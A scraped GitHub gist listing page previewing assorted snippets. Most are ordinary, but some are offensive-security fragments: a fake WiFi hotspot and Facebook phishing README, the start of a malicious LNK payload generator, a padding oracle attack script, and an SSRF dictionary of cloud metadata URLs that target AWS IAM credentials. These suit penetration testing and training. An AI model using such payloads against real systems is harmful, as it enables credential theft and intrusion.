Skip to content

Instantly share code, notes, and snippets.

View christophetd's full-sized avatar

Christophe Tafani-Dereeper christophetd

588 followers · 45 following
View GitHub Profile
@Drarig29
Drarig29 / so-you-think-you-know-git.md
Last active April 17, 2024 20:36
@ustayready
ustayready / gpt.py
Created January 16, 2023 23:49
CloudGPT - Use ChatGPT to analyze AWS policies for vulnerabilities
import openai
import boto3
import json
import time
from typing import Dict, List
openai.api_key = '### SET YOUR OPENAPI API KEY HERE ###'
session = boto3.session.Session()
client = session.client('iam')
@Cyberax
Cyberax / aws_mock.go
Created July 26, 2021 04:52
Reflective AwsMocks
package utils
import (
"context"
"github.com/aws/aws-sdk-go-v2/aws"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/smithy-go/middleware"
"reflect"
)
@elevenchars
elevenchars / fridanotes.md
Last active May 23, 2024 13:05
My notes on injecting a frida gadget into an apk
@grind086
grind086 / example.js
Last active January 14, 2019 14:51
Adding data to NaN values
console.log(examineNaN(NaN));
// > { isNaN: true, sign: 0, signaling: false, payload: 0 }
const nan = createNaN(false, false, 5000);
console.log(isNaN(nan));
// > true
console.log(examineNaN(nan));
// > { isNaN: true, sign: 0, signaling: false, payload: 5000 }
const nan2 = createNaN(false, false, [1, 2, 3, 4, 5, 6]);
@vtombez
vtombez / README.md
Last active November 27, 2021 19:58
RTSInfo - Création d'un faux hotspot WiFi

Objectifs

  • Créer un faux point d'accès Wifi public (hotspot) portable,
  • Créer un phishing Facebook phishing
  • Informer les utilisateurs de hotspots gratuits des dangers d'une connexion directe à un wifi ouvert.

Durant les expérimentations effectuées dans l'espace public, aucune information personnelle (login, mot de passe..) n'a été interceptée, stockée ou visualisée.

Quelques précisions

@enigma0x3
enigma0x3 / Create-LNK.ps1
Created January 5, 2017 15:04
function Create-LNKPayload{
<#
.SYNOPSIS
Generates a malicous LNK file
.PARAMETER LNKName
Name of the LNK file you want to create.
@bricef
bricef / PaddingOracle.py
Created September 8, 2016 20:56
Padding Oracle attack example in python
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import random
import sys
from Crypto.Cipher import AES
BLOCK_SIZE = 16 # bytes
INIT_VEC = 'This is an IV456' # hardcoding this is a terrible idea
@unfo
unfo / how-to-oscp-final.md
Last active February 26, 2024 08:39

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@BuffaloWill
BuffaloWill / cloud_metadata.txt
Last active May 25, 2024 21:22
Cloud Metadata Dictionary useful for SSRF Testing
## IPv6 Tests
http://[::ffff:169.254.169.254]
http://[0:0:0:0:0:ffff:169.254.169.254]
## AWS
# Amazon Web Services (No Header Required)
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/meta-data/iam/security-credentials/dummy
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]